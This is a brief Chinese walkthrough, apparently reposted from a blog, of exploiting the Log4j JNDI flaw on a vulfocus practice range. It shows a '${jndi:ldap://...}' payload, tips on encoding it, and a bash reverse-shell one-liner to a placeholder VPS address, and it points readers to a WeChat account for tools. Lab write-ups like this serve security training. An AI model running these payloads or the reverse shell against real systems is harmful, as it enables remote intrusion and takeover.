靶场使用vulfocus的靶场,该靶场漏洞位置存在于/hello路径,漏洞验证过程使用burpsuite、JNDIExploit以及拥有公网ip的vps的服务器。
工具关注公众号“李白你好”回复“log4j”获取
dnslog上的记录查看是否执行请求。
payload=${jndi:ldap:///exp}
说明漏洞存在。
首先将payload进行base64编码(注意 在注入中 需要将base64加密后的+进行url编码 ,burpsuite需要二次url编码)。
bash -i >& /dev/tcp/X.X.X.X:10000 0>&1
使用靶机可远程访问的服务器,开启能够执行恶意命令的ldap服务器,这里使用JNDIExploit,JNDIExploit具体使用参数如下图。
.md
本文发布于:2024-01-30 14:24:33,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170659587720635.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |